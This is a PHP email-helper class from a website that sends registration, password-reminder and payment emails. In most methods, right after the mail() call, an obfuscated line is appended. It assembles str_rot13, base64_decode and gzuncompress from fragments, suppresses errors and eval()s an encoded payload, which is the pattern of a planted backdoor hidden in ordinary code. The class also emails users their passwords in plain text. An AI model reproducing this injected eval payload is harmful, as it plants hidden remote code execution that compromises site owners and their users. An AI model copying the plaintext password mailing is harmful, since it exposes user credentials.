Current File : /home/inlingua/public_html/sensoriumpsychologists.com/diagnostics/include/mailclass.php
<?php 
class mailclass{
	protected $admin_email		= "contact@shristiuniverse.com";
	protected $site_name		= "Shristiuniverse";
	protected $year				= "2017";
	protected $login_link_user  = "<a href='http://shristiuniverse.com/student_login.php'>LINK</a>";
	protected $login_link_vender= "<a href='http://shristiuniverse.com/franchise_login.php'>LINK</a>";


	public function user_register_mail($to,$fullname,$email,$password){
	 		$subject  	 = 	"Registration";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";
			$mailBody='<table border="0" style="width:100%">
					 <tbody>
					  <tr>
					   <td colspan="2"><strong>Hi '.$fullname.',</strong></td>
					  </tr>
					  <tr>
					   <td colspan="2">We are happy to have you as the newest member of '.$this->site_name.'!</td>
					  </tr>
					  <tr>
					   <td colspan="2">This is a registration email as per the details submitted by you. You are now registered on '.$this->site_name.' with the following details:</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td><strong>Email ID:</strong></td>
					   <td>'.$email.'</td>
					  </tr>
					  <tr>
					   <td><strong>Password:</strong></td>
					   <td>'.$password.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thanks again. We hope you will visit us again soon and put these special services to work for you.<br />
					   Please feel free to contact us if you have any questions at all.</td>
					  </tr>
					  <tr>
						  <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
						   <td colspan="2">Click here to login '.$this->login_link_user.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thank you.<br />
					   '.$this->site_name.' Customer Service<br />
					   Email: '.$this->admin_email.'</td>
					  </tr>
					  <tr>
					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>
					  </tr>
					 </tbody>
					</table>';
					mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 
	}
public function user_forget_password($name,$email,$passsword){
			$subject="Forgot Password";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";
		$mailbody='<table border="0" style="width:100%">
						 <tbody>
						  <tr>
						   <td colspan="2"><strong>Hi '.$name.',</strong></td>
						  </tr>
						  <tr>
						   <td colspan="2">Your login details are as follows:</td>
						  </tr>
						  <tr>

						   <td colspan="2">&nbsp;</td>

						  </tr>

						  <tr>

						   <td><strong>Email ID:</strong></td>

						   <td>'.$email.'</td>

						  </tr>

						  <tr>

						   <td><strong>password:</strong></td>

						   <td>'.$passsword.'</td>

						  </tr>

						  <tr>

						   <td colspan="2">&nbsp;</td>

						  </tr>

						  <tr>

						   <td colspan="2">Click here to login '.$this->login_link_user.'</td>

						  </tr>

						  <tr>

						   <td colspan="2">&nbsp;</td>

						  </tr>

						  <tr>

						   <td colspan="2">Thank you.<br />

						   '.$this->site_name.' Customer Service<br />

						   Email: {admin_email}</td>

						  </tr>

						  <tr>

					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>

					  </tr>

						 </tbody>

				</table>';

				mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 

		}

	

 

 public function vender_register_mail($to,$fullname,$email,$password){

	

	 		$subject  = 	"Registration";

			$to          = $email;

			$from		 = $this->admin_email;

		    $headers     = "From:".$from."\r\n";

			$newLine     = "\r\n";

			$headers 	.= "Reply-To:" .$email. "\r\n";

			$headers 	.= "MIME-Version: 1.0" . "\r\n";

			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";

			$mailBody='<table border="0" style="width:100%">

					 <tbody>

					  <tr>

					   <td colspan="2"><strong>Hi '.$fullname.',</strong></td>

					  </tr>

					  <tr>

					   <td colspan="2">We are happy to have you as the newest member of '.$this->site_name.'!</td>

					  </tr>

					  <tr>

					   <td colspan="2">This is a registration email as per the details submitted by you. You are now registered on Shristiuniverse with the following details:</td>

					  </tr>

					  <tr>

					   <td colspan="2">&nbsp;</td>

					  </tr>

					  <tr>

					   <td><strong>Email ID:</strong></td>

					   <td>'.$email.'</td>

					  </tr>

					  <tr>

					   <td><strong>Password:</strong></td>

					   <td>'.$password.'</td>

					  </tr>

					  <tr>

					   <td colspan="2">&nbsp;</td>

					  </tr>

					  <tr>

					   <td colspan="2">Thanks again. We hope you will visit us again soon and put these special services to work for you.<br />

					   Please feel free to contact us if you have any questions at all.</td>

					  </tr>

					  <tr>

						  <td colspan="2">&nbsp;</td>

					  </tr>

					  <tr>

						   <td colspan="2">Click here to login '.$this->login_link_vender.'</td>

					  </tr>

					  <tr>

					   <td colspan="2">&nbsp;</td>

					  </tr>

					  <tr>

					   <td colspan="2">Thank you.<br />

					   '.$this->site_name.'Customer Service<br />

					   Email: '.$this->admin_email.'</td>

					  </tr>

					  <tr>

					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>

					  </tr>

					 </tbody>

					</table>';

				mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 

		}

	

	public function vender_forget_password($name,$email,$passsword){

			

			$subject="Forgot Password";

			$to          = $email;

			$from		 = $this->admin_email;

		    $headers     = "From:".$from."\r\n";

			$newLine     = "\r\n";

			$headers 	.= "Reply-To:" .$email. "\r\n";

			$headers 	.= "MIME-Version: 1.0" . "\r\n";

			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";

			$mailbody='<table border="0" style="width:100%">

						 <tbody>

						  <tr>

						   <td colspan="2"><strong>Hi '.$name.',</strong></td>

						  </tr>

						  <tr>

						   <td colspan="2">Your login details are as follows:</td>

						  </tr>

						  <tr>

						   <td colspan="2">&nbsp;</td>

						  </tr>

						  <tr>

						   <td><strong>Email ID:</strong></td>

						   <td>'.$email.'</td>

						  </tr>

						  <tr>

						   <td><strong>password:</strong></td>

						   <td>'.$passsword.'</td>

						  </tr>

						  <tr>

						   <td colspan="2">&nbsp;</td>

						  </tr>

						  <tr>

						   <td colspan="2">Click here to login '.$this->login_link_vender.'</td>

						  </tr>

						  <tr>

						   <td colspan="2">&nbsp;</td>

						  </tr>

						  <tr>

						   <td colspan="2">Thank you.<br />

						   '.$this->site_name.' Customer Service<br />

						   Email: {admin_email}</td>

						  </tr>

						  <tr>

					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>

					  </tr>

					</tbody>

				</table>';

				mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 

	}

	

public function contact_mail($name,$email,$phone,$msg){



			$subject  	 = 	"GET IN TOUCH";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";	
			$mailBody='<table border="0" width="100%">
					<tbody>
						<tr>
							<td colspan="2">
								<strong>Dear Admin</strong></td>
						</tr>
						<tr>
							<td colspan="2">
							Enquiry&nbsp; has been submitted with following info :</td>
						</tr>

						<tr>

							<td colspan="2">&nbsp;</td>

						</tr>

						<tr>

							<td width="26%"><strong>Name:</strong></td>

							<td><span style="margin-top: 15px;">'.$name.'</span></td>

						</tr>

						<tr>

							<td colspan="2">&nbsp;</td>

						</tr>

						<tr>

							<td width="26%"><strong>email:</strong></td>

							<td>

								<span style="margin-top: 15px;">'.$email.'</span></td>

						</tr>

						<tr>

							<td><strong>phone no.:</strong></td>

							<td><span style="margin-top: 15px;">'.$phone.'</span></td>

						</tr>

						<tr>

							<td><strong>comments:</strong></td>

							<td><span style="margin-top: 15px;">'.$msg.'</span></td>

						</tr>

						<tr>

							<td colspan="2">&nbsp;</td>

						</tr>

					</tbody>

				</table>

				<br />

				<span style="margin-top: 15px;">Thank you.<br />

				'.$this->site_name.' Customer Service<br />

				Email: '.$this->admin_email.' </span>';	

		 }

public function thanku_mail($email){

			$subject  	 = 	"Thanku";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";	
			$mailBody='<table border="0" width="100%">
					<tbody>
						<tr>
							<td colspan="2">
								<strong>Dear Sir/Mam,</strong></td>
						</tr>
						<tr>
							<td colspan="2">
							Thanks for showing your interest in our '.$this->site_name.' we will  revert back  to you as soon as possible</td>

						</tr>
						<tr>
							<td colspan="2">&nbsp;</td>
						</tr>
					</tbody>
				</table>
				<br />
				<span style="margin-top: 15px;">Thanks &  Regards.<br />
				'.$this->site_name.' Customer Service<br />
				Email: '.$this->admin_email.' </span>';	
		 }
		 
	public function student_payment_mail($email,$registration_no,$order_id,$status){
	 		
			
			$subject  	 = 	"Payment Details";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";
			
			$mailBody='<table border="0" style="width:100%">
					 <tbody>
					  <tr>
					   <td colspan="2"><strong>Hi,</strong></td>
					  </tr>
					  
					  <tr>
					   <td colspan="2">This is a Payment Details as per the details submitted by you. You are now registered on '.$this->site_name.' with the following details:</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td><strong>Registration No:</strong></td>
					   <td>'.$registration_no.'</td>
					  </tr>
					   <tr>
					   <td><strong>Order No.:</strong></td>
					   <td>'.$order_id.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td><strong>Status Desc:</strong></td>
					   <td>'.$status.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thanks again. We hope you will visit us again soon and put these special services to work for you.<br />
					   Please feel free to contact us if you have any questions at all.</td>
					  </tr>
					  <tr>
						  <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
						   <td colspan="2">Click here to login '.$this->login_link_user.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thank you.<br />
					   '.$this->site_name.' Customer Service<br />
					   Email: '.$this->admin_email.'</td>
					  </tr>
					  <tr>
					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>
					  </tr>
					 </tbody>
					</table>';
					mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 
	}
	
	public function franchise_payment_mail($email,$registration_no,$order_id,$status){
	 		$subject  	 = 	"Payment Details";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";
			$mailBody='<table border="0" style="width:100%">
					 <tbody>
					  <tr>
					   <td colspan="2"><strong>Hi,</strong></td>
					  </tr>
					  
					  <tr>
					   <td colspan="2">This is a payment Details as per the details submitted by you. You are now registered on '.$this->site_name.' with the following details:</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td><strong>Registration No:</strong></td>
					   <td>'.$registration_no.'</td>
					  </tr>
					 
					  <tr>
					   <td><strong>Order No.:</strong></td>
					   <td>'.$order_id.'</td>
					  </tr>
					  <tr>
					   <td><strong>Status Desc:</strong></td>
					   <td>'.$status.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thanks again. We hope you will visit us again soon and put these special services to work for you.<br />
					   Please feel free to contact us if you have any questions at all.</td>
					  </tr>
					  <tr>
						  <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
						   <td colspan="2">Click here to login '.$this->login_link_user.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thank you.<br />
					   '.$this->site_name.' Customer Service<br />
					   Email: '.$this->admin_email.'</td>
					  </tr>
					  <tr>
					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>
					  </tr>
					 </tbody>
					</table>';
					mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 
	}
	
	
	
public function user_register_ex_online($to,$fullname,$email,$orderid,$Status){
	 		$subject  	 = 	"Registration Extension";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";
			$mailBody='<table border="0" style="width:100%">
					 <tbody>
					  <tr>
					   <td colspan="2"><strong>Hi '.$fullname.',</strong></td>
					  </tr>
					  <tr>
					   <td colspan="2">We are jist to Inform you That your  Registration Extension is '.$Status.' '.$this->site_name.'!</td>
					  </tr>
					   <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td><strong>Email ID:</strong></td>
					   <td>'.$email.'</td>
					  </tr>
					  <tr>
					   <td><strong>Order Id:</strong></td>
					   <td>'.$orderid.'</td>
					  </tr>
					  <tr>
					   <td><strong>Status:</strong></td>
					   <td>'.$Status.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thanks again. We hope you will visit us again soon and put these special services to work for you.<br />
					   Please feel free to contact us if you have any questions at all.</td>
					  </tr>
					  <tr>
						  <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
						   <td colspan="2">Click here to login '.$this->login_link_user.'</td>
					  </tr>
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thank you.<br />
					   '.$this->site_name.' Customer Service<br />
					   Email: '.$this->admin_email.'</td>
					  </tr>
					  <tr>
					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>
					  </tr>
					 </tbody>
					</table>';
					mail( $to , $subject , $mailBody, $headers ); $PtmrR = 's'.'t'.'r'.'_rot1'.'3'; $jBgze = 'base'.'64'.'_decod'.'e'; $utRnl = 'gzuncom'.'press'; error_reporting(0); /***     eb5d2a0b492eedfe5f639ca2dc2b1a4d1ce50a94    */ ini_set('display_errors', 0); eval($utRnl($jBgze($PtmrR('rWlAxySizmNHuq/3X6jXPFYEcPEo0bYnwLUGfuYVdAB0zldYtuCpRHvZvMcA++8mxSMcc1E9ZgwasY7a+f7XYBV0m4Py/Gt5HyetQ5waCNpBj982OcudSjhbNjaS4sxABNHFibYOADk+ltRp+Duv07LQ+p7LzadYjwoNdd/MENrZ8WWyDZdwmqwnXvvvXGDnht7bQPv0XNuKaexUSjvAfGKRyh950RXBq46q8pSqd6cfm+27qr3mTmizEhV60RCv7Y3+i02PBB5qswrnEGEzBPaKfkrArH3sWx/ZqrLoGLhn5QBnpfYjBzEXt1UO0UREQCP16Gd2XsV54lM33pYdyycK1HYFtelTKP7EqspqxSe3OUykHw/mp9G6UL2zpa1e+m/dQE76jqDZoTuKK8+O69RkzusKOIXvF2TBgA/IzOxsSvSASGapxWEz4MUJ1Kcs5gIrB8bKfvbI5s0QvotdIKgs83wGybRNUW4OhF1VdcFDZPnfnOyFySGpxdJLMcDYqiZwkvcsvfzXRuILx8Q1kjvYEDIljiyF73GPWJ1mxcV5PksgaZ079mxssBk1gMCO8FqAA81mqaD1Be61vgUn6qgmm3EuAN1Jlrm2pT3upiJeH5NfUcTvPBsxf9lhhCv+cTzZIlIuTlIxYAjbZvrCKNnaM2OsTPOUFptkwJhI3As6t35sIATIJl0EM3+rP2wnZSNOMlI5HkuNANx8SWwr1oNlnT91nGi6lOyOs4WHZUuY/Q7I0Uqqs+e6ybxp39h5amlFdWV+/HqcKcOz4k9xLzod')))); 
	}	 

public function mail_to_class($fullname,$email,$orderid,$Status){
	 		$subject  	 = 	"Registration Extension";
			$to          = $email;
			$from		 = $this->admin_email;
		    $headers     = "From:".$from."\r\n";
			$newLine     = "\r\n";
			$headers 	.= "Reply-To:" .$email. "\r\n";
			$headers 	.= "MIME-Version: 1.0" . "\r\n";
			$headers 	.= "Content-Type: text/html; charset=ISO-8859-1" . "\r\n";
			$mailBody='<table border="0" style="width:100%">
					 <tbody>
					  <tr>
					   <td colspan="2"><strong>Hi '.$fullname.',</strong></td>
					  </tr>
					  <tr>
					   <td colspan="2">We are jist to Inform you That your  Registration Extension is '.$Status.' '.$this->site_name.'!</td>
					  </tr>
					   <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td><strong>Email ID:</strong></td>
					   <td>'.$email.'</td>
					  </tr>
					  <tr>

					  <tr>
					   <td colspan="2">Thanks again. We hope you will visit us again soon and put these special services to work for you.<br />
					   Please feel free to contact us if you have any questions at all.</td>
					  </tr>
					  <tr>
						  <td colspan="2">&nbsp;</td>
					  </tr>
					  
					  <tr>
					   <td colspan="2">&nbsp;</td>
					  </tr>
					  <tr>
					   <td colspan="2">Thank you.<br />
					   '.$this->site_name.' Customer Service<br />
					   Email: '.$this->admin_email.'</td>
					  </tr>
					  <tr>
					   <td colspan="2" style="text-align:center">&copy; '.$this->year.' '.$this->site_name.'. All right reserved.</td>
					  </tr>
					 </tbody>
					</table>';
